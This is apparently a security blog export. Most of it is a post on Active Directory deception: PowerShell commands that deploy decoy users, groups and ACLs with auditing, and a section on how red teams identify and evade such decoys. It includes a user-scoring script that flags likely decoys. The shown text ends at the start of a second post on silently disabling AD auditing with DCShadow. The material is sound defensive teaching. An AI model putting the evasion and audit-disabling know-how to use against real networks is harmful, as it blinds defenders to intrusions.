<br />
<h4>Enumeration - Decoy Group Objects</h4>We can also deploy decoy Group objects. What properties of a group are interesting to an adversary?<br />
<ul><li>Interesting name (containing words like admins, administrators etc.) </li>
<li>Members of the group are also members of highly privileged groups or have 'interesting' user attributes. </li>
<li>Membership of a highly privileged group. </li>
</ul><br />
Groups provide interesting opportunities. We can make decoy users members of a decoy group, thus creating 'layered' decoys. This way we get logs both when the membership of the decoy group is listed and when the attributes of the decoy user are listed. We will see soon how to use logon restrictions to avoid misuse of a user's privileges.<br />
<br />
So in the below commands, we create a decoy user 'dnsmanager' whose password never expires, with logging when an obscure property is read; create a group named 'Forest Admins'; make dnsmanager a member of the Forest Admins group; and add the Forest Admins group to the built-in DnsAdmins group. Logging is triggered when the membership of the group is read (the GUID below is that of the member attribute). We can use Deploy-GroupDeception for this:<br />
<pre><textarea cols="70" readonly="readonly" rows="7" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName dns -UserLastName manager -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
PS C:\> Create-DecoyGroup -GroupName 'Forest Admins' -Verbose | Deploy-GroupDeception -AddMembers dnsmanager -AddToGroup dnsadmins -GUID bc0ac240-79a9-11d0-9020-00c04fc2d4cf -Verbose
</textarea></pre><br />
<h4>Enumeration and Lateral Movement - Privileged Decoy User Objects</h4>We can also deploy high privilege user decoys to target both enumeration and lateral movement. We can create decoy users which have high privileges like membership of Domain Admins, the rights to execute DCSync, etc.<br />
<br />
Now, the risk with having decoy users with such high privileges is that if such a user gets compromised, its privileges can be abused. To avoid that, we can use a couple of protections:<br />
<ul><li>Set the Logon Workstation to a non-existent machine</li>
<li>Deny logon to the user. </li>
</ul>In both the above cases, AFAIK, the user's privileges cannot be used, as the decoy user cannot log on to any box with any type of credential (password, hash etc.). Of the two, treat DenyLogon as the stronger protection: the workstation restriction is checked against the workstation name the client itself supplies during authentication.<br />
<br />
Armed with this knowledge, let's create high privilege user decoys using Deploy-PrivilegedUserDeception:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMemebership -Protection DenyLogon -Right ReadControl -Verbose
</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOzIqM9APuIyzku_jUaHrmTHmJyiDTc5mGAbSU5nNTr3OMQekyRLhf7ixL9OHK_m-Y0xaZd7Kyt3dOpHGqxBL8MTnlzGIuRAvaq-dCZqT5VY1B2yKfvCqaRbD5dc1M6_zPUKbuKqtjL5Q/s1600/privilege_userdeception.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="395" data-original-width="1600" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOzIqM9APuIyzku_jUaHrmTHmJyiDTc5mGAbSU5nNTr3OMQekyRLhf7ixL9OHK_m-Y0xaZd7Kyt3dOpHGqxBL8MTnlzGIuRAvaq-dCZqT5VY1B2yKfvCqaRbD5dc1M6_zPUKbuKqtjL5Q/s400/privilege_userdeception.png" width="400" /></a></div>The above command creates a user called 'decda' who is a member of Domain Admins but cannot log on to any machine. Any attempt to list the DACL of the user or to list all its attributes results in a 4662 log.<br />
<br />
For the lateral movement part, we used the DenyLogon protection. That means even if the user's password, hash or keys are compromised, it will not be possible to reuse those credentials. To get meaningful logs when the credentials of such a user are used, we must enable the following Group Policy setting:<br />
Computer Configuration|Windows Settings|Security Settings|Advanced Audit Policy Configuration|Audit Policies|Account Logon|Audit Kerberos Authentication Service|Failure<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1r17dbvHXozw25l7sxfRKw8Kv2wb5idA1e4UqFEDTFpVoRSTSBhWDFXGMtlHlRBppfTHUf_FT_zeiDetb275fsKv-skA6jClXeLDc4KaNXJKPpWEUGbQz7Q_QIh3bYzPugdOT2ITpK5g/s1600/GP_Kerberos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="615" data-original-width="1031" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1r17dbvHXozw25l7sxfRKw8Kv2wb5idA1e4UqFEDTFpVoRSTSBhWDFXGMtlHlRBppfTHUf_FT_zeiDetb275fsKv-skA6jClXeLDc4KaNXJKPpWEUGbQz7Q_QIh3bYzPugdOT2ITpK5g/s400/GP_Kerberos.png" width="400" /></a></div>This is what the failure looks like in the GUI.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKjwMYmMzkE0aCnRE2fEjsRQTf2Ev5uVx_p2xccJKZCaS0hiGRTAQvRXfJyX6vnuQYwFl9t0odPhrzWcwx1K8CdLC75H6wrZDGg7V9ZkXBZ4H8dT-8qg7LRt2CrWJNwX-aZafVye0OEIo/s1600/Faliure.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="511" data-original-width="569" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKjwMYmMzkE0aCnRE2fEjsRQTf2Ev5uVx_p2xccJKZCaS0hiGRTAQvRXfJyX6vnuQYwFl9t0odPhrzWcwx1K8CdLC75H6wrZDGg7V9ZkXBZ4H8dT-8qg7LRt2CrWJNwX-aZafVye0OEIo/s320/Faliure.png" width="320" /></a></div>And a 4768 (Failure) is logged on the Domain Controller. In the case of attacks like Overpass-the-Hash, no such verbose error is shown on the attacker's side, but the KDC still logs the failed 4768.<br />
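As an added example (not from the post or the toolkit), here is one way to pull what the decoys produce out of a DC's Security log: 4662s on the decoy objects created above, with a note on whether one of the watched attributes was read, and failed 4768s for the logon-restricted decoys. The decoy names and attribute GUIDs are the ones used in this post; the lookback window, LOGONSERVER as the default DC and the function name are assumptions.<br />

```powershell
# Added example (not part of Deploy-Deception). Needs the ActiveDirectory module
# and read access to the DC's Security log.
Import-Module ActiveDirectory

function Get-DecoyAlerts {
    param(
        [string[]]$DecoyUsers = @('usermanager', 'decda', 'newda'),
        # Attribute GUIDs the SACLs above watch: x500uniqueIdentifier and member
        [string[]]$WatchedGuids = @('d07da11f-8a3d-42b6-b0aa-76c962be719a',
                                    'bc0ac240-79a9-11d0-9020-00c04fc2d4cf'),
        [int]$LookbackHours = 24,                                    # assumption
        [string]$DomainController = $env:LOGONSERVER.TrimStart('\')  # assumption
    )
    # 4662 names the target by DN or by %{objectGUID}, so resolve both once
    $decoys = foreach ($u in $DecoyUsers) {
        Get-ADUser -Identity $u -Server $DomainController |
            Select-Object SamAccountName, DistinguishedName, ObjectGUID
    }

    $filter = @{ LogName = 'Security'; Id = 4662, 4768
                 StartTime = (Get-Date).AddHours(-$LookbackHours) }
    $events = Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($ev in $events) {
        # Flatten the <Data Name="...">value</Data> elements into a hashtable
        $d = @{}
        foreach ($n in ([xml]$ev.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        if ($ev.Id -eq 4662) {
            $hit = $decoys | Where-Object {
                $d.ObjectName -eq $_.DistinguishedName -or $d.ObjectName -like "*$($_.ObjectGUID)*" }
            if (-not $hit) { continue }
            # Properties lists the GUIDs of the attributes that were accessed
            $watched = @($WatchedGuids | Where-Object { $d.Properties -match $_ })
            if ($watched.Count) { $detail = "read watched attribute(s) $($watched -join ', ')" }
            else                { $detail = "access mask $($d.AccessMask), properties $($d.Properties)" }
            [pscustomobject]@{
                Time = $ev.TimeCreated; Event = 4662; Decoy = ($hit.SamAccountName -join ',')
                Actor = "$($d.SubjectDomainName)\$($d.SubjectUserName)"; Detail = $detail
            }
        }
        elseif ($ev.Id -eq 4768 -and $d.Status -ne '0x0' -and $DecoyUsers -contains $d.TargetUserName) {
            # A TGT request for a logon-restricted decoy can only fail, so any
            # 4768 with a non-zero status means its credentials were reused
            [pscustomobject]@{
                Time = $ev.TimeCreated; Event = 4768; Decoy = $d.TargetUserName
                Actor = $d.IpAddress; Detail = "AS-REQ failed with status $($d.Status)"
            }
        }
    }
}

# Get-DecoyAlerts | Sort-Object Time | Format-Table -AutoSize
```

Run it on, or against, the DC that holds the log; a 4768 lands on whichever DC answered the AS-REQ, so check every DC or forward the Security logs centrally. A 4662 from a monitoring account that never touches a watched attribute is the false positive to tune out first; a 4768 for a decoy with any non-zero Status is exactly what the DenyLogon and LogonWorkstation protections exist to surface.<br />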
<br />
Another option is to set LogonWorkstation to a nonexistent machine. It always makes sense to use a workstation name similar to those of your actual machines. <br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DCSyncRights -Protection LogonWorkStation -LogonWorkStation revert-webserver1 -Right ReadControl -Verbose
</textarea></pre>The above command creates a decoy user called 'decda', grants it DCSync permissions and sets LogonWorkStation to a non-existent machine. If the user's credentials are compromised and reused, the error is exactly the same as in the DenyLogon case and a 4768 is logged.<br />
<br />
Both protections can be used with a non-DA account as well. IMHO, this is better than leaving wrong passwords or hashes in memory (which is a well known technique).<br />
<br />
This technique can always be coupled with others. For example, when targeting lateral movement, one of the easier ways to let an adversary 'retrieve' credentials for a decoy user is the -PasswordInDescription option of Deploy-UserDeception. Then, we can make that user privileged and use one of the protections discussed above:<br />
<pre><textarea cols="70" readonly="readonly" rows="6" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName new -UserLastName da -Password Pass@123 | Deploy-UserDeception -PasswordInDescription 'The new password is Pass@123' -Verbose
PS C:\> Deploy-PrivilegedUserDeception -DecoySamAccountName newda -Technique DomainAdminsMemebership -Protection DenyLogon -Right ReadControl -Verbose
</textarea></pre></div><div style="text-align: justify;">The first command above creates a new user called 'newda' and sets the string 'The new password is Pass@123' as its description. The second command makes newda a member of the Domain Admins group, denies logon to the user and configures auditing whenever the DACL or all attributes of newda are read.<br />
<br />
No special tools are required to get the password from the description! Remember 'go for the lowest hanging fruit' ;)<br />
<br />
While discussing users with privileges, there is another important aspect that must be discussed: ACLs. A user which has interesting permissions over another user is always of interest to an attacker. (Side note: make sure that ACL auditing is a part of your security methodology - both for <a href="https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1">domain objects</a> and <a href="https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1">other</a> <a href="https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1">securables</a>.)<br />
<br />
We can use Deploy-SlaveDeception to deploy decoy users where one of the users has FullControl/GenericAll rights over the other. This is interesting for an attacker and can be used to target both the enumeration and lateral movement phases. <br />
<br />
To target enumeration, the following can be used:<br />
<pre><textarea cols="70" readonly="readonly" rows="9" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName master -UserLastName user -Password Pass@123 | Deploy-UserDeception -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
PS C:\> Create-DecoyUser -UserFirstName slave -UserLastName user -Password Pass@123 | Deploy-UserDeception -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
PS C:\> Deploy-SlaveDeception -SlaveSamAccountName slaveuser -DecoySamAccountName masteruser -Verbose
</textarea></pre>The first and second commands above create the users masteruser and slaveuser respectively and set auditing only when an obscure attribute is read. The third command grants masteruser GenericAll rights over slaveuser. Any adversary enumerating or scanning for interesting ACLs in your domain will trigger a 4662 for both objects. <br />
<br />
<br />
To target lateral movement, we can use the PasswordInDescription option for masteruser or leave its credentials lying around using other popular methods, without any protection. We are ready to risk masteruser being compromised and used (please carefully consider the risks before doing that). If masteruser modifies the DACL of slaveuser, we get a 4662 log in addition to any other alerts that are triggered whenever a honeytoken/honeyuser is used: <br />
<pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: #012456; color: white;"> PS C:\> Create-DecoyUser -UserFirstName master -UserLastName user -Password Pass@123
PS C:\> Create-DecoyUser -UserFirstName slave -UserLastName user -Password Pass@123
PS C:\> Deploy-SlaveDeception -SlaveSamAccountName slaveuser -DecoySamAccountName masteruser -Verbose
PS C:\> Deploy-UserDeception -DecoySamAccountName slaveuser -Principal masteruser -Right WriteDacl -Verbose
</textarea></pre>With the above commands, a 4662 is logged only when masteruser changes the DACL of slaveuser.<br />
<br />
<h4>Enumeration - Domain and Forest Trust objects</h4>Yet to be automated! There are many interesting possibilities, though. For example, we can have a decoy forest trust (let's call it the blue forest :P) where we allow enumeration of users, computers and groups but deny access to any other resource. This can be achieved by setting up a forest trust with Selective Authentication, where 'Allowed to Authenticate' is granted only on the DC and on no other machine. This allows an adversary to enumerate objects, but they cannot access resources on other computers.<br />
<br />
<h4>Red Team Revenge - Identifying Deception</h4>So how do red teams identify which objects are real and which are traps or decoys? As I mentioned at the beginning of the post, I have tested multiple deception solutions over the past months. There are multiple enterprise solutions that use objects which can be identified by looking at their attributes. Some such attributes:<br />
<br />
<ul><li><b>objectSid </b>- This attribute must always have the DomainSID-RID format. Some enterprise solutions mess that up. If you find an object whose SID is not prefixed with the domain SID, make sure you investigate that object carefully. </li>
<li><b>lastLogon, lastLogonTimestamp </b>- User decoys can be identified by looking at these attributes. If there is a user, particularly a highly privileged one, who has never logged on (lastLogon is 0, which the GUI shows as 31/12/1600 or 1/1/1601, the 'zero' date of the LargeInteger datetime format), there is a good chance that it is a decoy. Remember that lastLogon is not replicated between DCs, while lastLogonTimestamp is. </li>
<li><b>logonCount</b> - Although not as good as lastLogon, logonCount is also a good indicator.</li>
<li><b>whenCreated</b> - Coupled with lastLogon and logonCount, this becomes a good indicator. A user which is old but has never logged on could be a decoy. Note that it may also be a dormant user; to be sure, have a look at the other attributes. </li>
<li><b>badPwdCount, badPasswordTime</b> - Ever seen a human user who never fat-fingers their password? A user with badPwdCount 0 and an empty badPasswordTime is a good indicator of a decoy (badPwdCount resets after a successful logon or once the lockout observation window passes, so badPasswordTime is the more reliable of the two). </li>
<li><b>Too many attributes </b>- Some enterprise solutions fill in ALL or far too many of the possible attributes of an object. This can also be easily spotted. </li>
</ul>The best way is to compare an object with a known 'good' object. For example, if you suspect that a computer object in the list of all computers in the domain is a decoy, compare it with the properties of the domain controller or the attributes of your own foothold machine. The actual DC is always listed in the LOGONSERVER environment variable. For user objects, the built-in Administrator always has RID 500. Compare its attributes with those of a user object you suspect of being a decoy.<br />
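Putting those indicators together, as an added example that is neither the post's code nor any product's: the script below scores every user in the domain on the attributes listed above and uses the built-in Administrator (RID 500) as the known-good object to compare against, as suggested. The thresholds (30 days, 6 logons, three indicators before reporting) and the function name are assumptions; lastLogon is not replicated, so the result depends on which DC you query, and a high score is a reason to look closer, not proof.<br />

```powershell
# Added example (not from the post). Needs the ActiveDirectory module and a
# domain user; every attribute read here is readable by any authenticated user.
Import-Module ActiveDirectory

function Find-SuspectedDecoyUsers {
    param(
        [int]$MinAgeDays = 30,   # "old but never used" threshold (assumption)
        [int]$MinLogons  = 6,    # HoneypotBuster treats logonCount below this as suspicious
        [int]$MinReasons = 3,    # how many indicators before we report (assumption)
        [string]$Server  = $env:LOGONSERVER.TrimStart('\')   # the DC that logged us on
    )
    $domainSid = (Get-ADDomain -Server $Server).DomainSID.Value
    # Known-good baseline: the built-in Administrator always has RID 500
    $baseline  = Get-ADUser -Identity "$domainSid-500" -Server $Server -Properties *
    $cutoff    = (Get-Date).AddDays(-$MinAgeDays)

    foreach ($u in Get-ADUser -Filter * -Server $Server -Properties *) {
        if ($u.SID.Value -eq $baseline.SID.Value) { continue }
        $reasons = @()
        # lastLogon is per-DC; lastLogonTimestamp replicates but lags by up to 14 days
        $neverLoggedOn = (-not $u.lastLogon) -and (-not $u.lastLogonTimestamp)
        if ($neverLoggedOn)                                      { $reasons += 'never logged on' }
        if (-not $u.logonCount -or $u.logonCount -lt $MinLogons) { $reasons += "logonCount below $MinLogons" }
        if ($neverLoggedOn -and $u.whenCreated -lt $cutoff)      { $reasons += "older than $MinAgeDays days, never used" }
        if (-not $u.badPasswordTime)                             { $reasons += 'never had a bad password' }
        if ($u.SID.AccountDomainSid.Value -ne $domainSid)        { $reasons += 'SID not prefixed with the domain SID' }
        if ($u.adminCount -eq 1 -and $neverLoggedOn)             { $reasons += 'privileged (adminCount=1) yet unused' }
        # "Too many attributes": far more populated than the real Administrator
        if ($u.PropertyCount -gt 1.5 * $baseline.PropertyCount)  { $reasons += 'unusually many attributes populated' }

        if ($reasons.Count -ge $MinReasons) {
            [pscustomobject]@{
                SamAccountName = $u.SamAccountName
                Score          = $reasons.Count
                Reasons        = ($reasons -join '; ')
            }
        }
    }
}

# Find-SuspectedDecoyUsers | Sort-Object Score -Descending | Format-Table -AutoSize
```

Service accounts and freshly provisioned users score high too, so read the Reasons column rather than the number. Note that the script itself does what the blue team's SACLs are waiting for: with -Properties * it reads every attribute of every user, so it trips the x500uniqueIdentifier decoys from earlier in the post.<br />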
<br />
For multiple solutions which relied on not creating actual objects in the domain, using WMI to retrieve domain information shows the real objects and not the fake ones. <br />
<br />
<h4>Red Team Revenge - Avoiding Deception</h4>(Taken directly from my slides) Red teams need to change their approach and their psychology of illusory superiority to avoid deception:<br />
<ul><li>Please stop going for the lowest hanging fruit. Enterprise networks are a mess, but if something looks too good to be true, investigate carefully!</li>
<li>Avoid automated enumeration tools unless you absolutely know what they are doing in the background. </li>
<li>I have been urging this in my talks (on ATA) and trainings - avoid the urge to go for DA privileges just so that you can brag about it in the report! Focus on the goals of your operation. </li>
</ul><h4>Blue Teams - Avoiding identification</h4>If actual domain objects are used, the chances of identification decrease. For example, a computer object which is not mapped to an actual computer has a much higher chance of getting identified.<br />
<br />
For user decoys, as discussed earlier, having at least one logon session decreases the chances of identification. Let's test this out.<br />
<br />
Let's have a look at a simple example. There is a well known deception identification script called <a href="https://github.com/JavelinNetworks/HoneypotBuster">HoneypotBuster</a>. Let's create a decoy DA and run the script:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvMS44QkQugfVMOAVjNkwSsIfDI9A_t_G6KNKrssnSnBOp0GuvYsNaAKB2Uehms5h4Z0vgr2Eggw8EOdyFu6uB9R17hvogm_TtbgZ31WtMZwgNKs9X3rFR9CwUp9jSNCfLoOT4-INZEjY/s1600/honeypotbuster-detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="1181" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvMS44QkQugfVMOAVjNkwSsIfDI9A_t_G6KNKrssnSnBOp0GuvYsNaAKB2Uehms5h4Z0vgr2Eggw8EOdyFu6uB9R17hvogm_TtbgZ31WtMZwgNKs9X3rFR9CwUp9jSNCfLoOT4-INZEjY/s400/honeypotbuster-detection.png" width="400" /></a></div>Our decoy DA was detected. Deploy-PrivilegedUserDeception has an option 'CreateLogon'. This parameter starts and stops calculator on the DC as the decoy DA user, which populates the logon related properties of the user. To use this parameter, the LogonWorkstation protection must be set to the DC where the module is being executed. You can always change the behaviour of the user later.<br />
<pre><textarea cols="70" readonly="readonly" rows="4" style="background-color: #012456; color: white;"> PS C:\> Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMemebership -Protection LogonWorkStation -LogonWorkStation revert-dc -CreateLogon -Verbose
</textarea></pre>The above command creates decda, makes it a member of the Domain Admins group, restricts logon to the DC and creates a logon session (which also creates a profile on the DC). Now, if we run HoneypotBuster:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCLZBjWGXSi-G0d50WYHEDs1M6ouu845G4go8Sd7rQjEF8nSiiIw_xh9XsQPGXbOZLTGhAiDsRtRJlhXRYKvOr5n04XE-U9v8v-w51Jxy0uE4wrF_2mZ_JelEZW3Icueb7DNYc_VA2_cE/s1600/honeypotbuster-evasion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="511" data-original-width="1175" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCLZBjWGXSi-G0d50WYHEDs1M6ouu845G4go8Sd7rQjEF8nSiiIw_xh9XsQPGXbOZLTGhAiDsRtRJlhXRYKvOr5n04XE-U9v8v-w51Jxy0uE4wrF_2mZ_JelEZW3Icueb7DNYc_VA2_cE/s400/honeypotbuster-evasion.png" width="400" /></a></div>Sweet, the FakeRank (the tool's confidence) is down to 50. HoneypotBuster uses a ranking system for objects, and if a user has a logonCount less than 6 there will always be some confidence of it being fake. If we raise the logonCount of decda to 6 by starting a process with its credentials 6 times, it will not show up in this tool.<br />
<pre><textarea cols="70" readonly="readonly" rows="4" style="background-color: #012456; color: white;"> PS C:\> Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMemebership -Protection LogonWorkStation -LogonWorkStation revert-dc -CreateLogon -logonCount 6 -Verbose
</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuC8HIDc_pjlV9Ft_lcoHF2RMWAfL69guAvzi_tbTQdEvPVc8O-V1YO0CAt2gZqXpG-HytY2ayrqvl5mGqtg2pXNYUBy3JZgW4viVfxucrXye5r3aACHKrxI5WVeqOZ2vlAAVTjuGTwhw/s1600/honeypotbuster-evasioncommand.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="1600" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuC8HIDc_pjlV9Ft_lcoHF2RMWAfL69guAvzi_tbTQdEvPVc8O-V1YO0CAt2gZqXpG-HytY2ayrqvl5mGqtg2pXNYUBy3JZgW4viVfxucrXye5r3aACHKrxI5WVeqOZ2vlAAVTjuGTwhw/s400/honeypotbuster-evasioncommand.png" width="400" /></a></div>Now if we run HoneypotBuster, decda is not detected! But that is targeting this specific tool, so let's not read too much into this 'bypass'. <br />
<br />
<h4>Future Work and Community Involvement</h4>It would be great if you deployed the decoys in your domain environments and shared the results with me. That way, even if you cannot contribute to the code, you will help the project immensely.<br />
<br />
OU objects are just around the corner and should not take much longer to be included in the tool. I am also working on automating domain and forest trust decoys. I also have super ambitious plans of using virtualization to deploy decoy forests and computers in real time!<br />
<br />
That is all! Thank you very much for reading this rather long post. You can find slides and video of my talk at BruCON below!<br />
<br />
<iframe allowfullscreen="" center="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/910z0g2NGVm7AP" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;"><b> <a href="https://www.slideshare.net/nikhil_mittal/forging-trusts-for-deception-in-active-directory" target="_blank" title="Forging Trusts for Deception in Active Directory">Forging Trusts for Deception in Active Directory</a> </b> from <b><a href="https://www.slideshare.net/nikhil_mittal" target="_blank">Nikhil Mittal</a></b> </div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/EEceX5x2JY8/0.jpg" frameborder="0" height="485" src="https://www.youtube.com/embed/EEceX5x2JY8?feature=player_embedded" width="595"></iframe></div><br />
<br />
</div></div>Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-83142924192832290262018-05-03T22:17:00.001+05:302018-05-03T22:17:44.642+05:30Silently turn off Active Directory Auditing using DCShadow<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
My fascination with <a href="https://www.dcshadow.com/">DCShadow</a> continues, thanks to <a href="https://twitter.com/mysmartlogon">Vincent</a> and <a href="https://twitter.com/gentilkiwi">Benjamin</a>. I <a href="http://www.labofapenetrationtester.com/2018/04/dcshadow.html">blogged about it previously</a> as well.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
One very interesting thing which I recently discovered is the ability of DCShadow to modify the System Access Control List or <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa374872(v=vs.85).aspx">SACL</a>. When we enable auditing of success or failure on an AD object, an entry (called an <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa374868(v=vs.85).aspx">ACE - Access Control Entry</a>) is added to the SACL of that object. The permissions on an object are controlled by the DACL. For example, we modified the DACL of AdminSDHolder in the previous post for persistence.<br />
<br /></div>
<div style="text-align: justify;">
<b>The Problem</b><br />
<br /></div>
<div style="text-align: justify;">
So, the SACL controls auditing (logging) for an AD object. This means that if we would like to avoid logs for our activities during an assessment, we should turn it off at the very first chance. Right? But is it that easy? <br />
<br />
Let's assume that full auditing is turned on for the AdminSDHolder container and even a read operation is logged. This is what the SACL looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKlnwK_gpHBEogfCKokTd9EhQwOpkiGknYcgq7up3_xHqdn0qa_Osxk9bIWVgZHxXOPhYOx8w6yFA8k43lRrOU7JenUIPJ0C3J9trCBtzKCPpjmhyrnRDy-4lJK_mawMlP340_0atMmPw/s1600/AdminSDHolder-SACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="775" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKlnwK_gpHBEogfCKokTd9EhQwOpkiGknYcgq7up3_xHqdn0qa_Osxk9bIWVgZHxXOPhYOx8w6yFA8k43lRrOU7JenUIPJ0C3J9trCBtzKCPpjmhyrnRDy-4lJK_mawMlP340_0atMmPw/s400/AdminSDHolder-SACL.png" width="400" /></a></div>
The SACL governs what gets logged. For example, with the above auditing settings, if we add Full Control rights for a user to AdminSDHolder for persistence, an Event ID 4662 is logged: <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgByVlpj6g09QkrxOyFm2aADBbgrQOZdmwvT4IvKIZA0eh2qroQcgcAxfk60ZDGJxjsdpb4E5xWFS8Ctv1vgXR6lySCIHy9hQ4YMyFqPeJWnOtPGyzI5uoINqhAe1vfMYVX9JR5f_pFLQ4/s1600/AdminSDHolder-4662.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="797" data-original-width="927" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgByVlpj6g09QkrxOyFm2aADBbgrQOZdmwvT4IvKIZA0eh2qroQcgcAxfk60ZDGJxjsdpb4E5xWFS8Ctv1vgXR6lySCIHy9hQ4YMyFqPeJWnOtPGyzI5uoINqhAe1vfMYVX9JR5f_pFLQ4/s400/AdminSDHolder-4662.png" width="400" /></a></div>
Now, we would like to turn auditing off for the AdminSDHolder object so that the above logs are avoided. Right? Right? ;)<br />
<br />
This can be done by removing the ACEs. But it is not as silent as we would like it to be. Removing ACEs results in more 4662s:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDQ5B4h6Ud4EZlMrP8uLgbbc5qU7LLh_7YaRK-894bZOVV0TUt_rHt5pLUPEWqpv8o9eBTFKu9BAisKTpc9KIfeKsOTZa-FjXJTmi5e__Er4Qq8Q8Fpsv84A9iJwaySwOnVwZeGMUxvNA/s1600/AdminSDHolder-More4662.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="866" data-original-width="1336" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDQ5B4h6Ud4EZlMrP8uLgbbc5qU7LLh_7YaRK-894bZOVV0TUt_rHt5pLUPEWqpv8o9eBTFKu9BAisKTpc9KIfeKsOTZa-FjXJTmi5e__Er4Qq8Q8Fpsv84A9iJwaySwOnVwZeGMUxvNA/s400/AdminSDHolder-More4662.png" width="400" /></a></div>
In case we were targeting a user object and removed auditing for it, a 4738 (User Account Management) is logged in addition to multiple 4662s.<br />
<br />
<b>The Solution</b><br />
<br /></div>
<div style="text-align: justify;">
Now, how does DCShadow help? Try the below command to push a new nTSecurityDescriptor for AdminSDHolder, which turns off the enhanced auditing:<br />
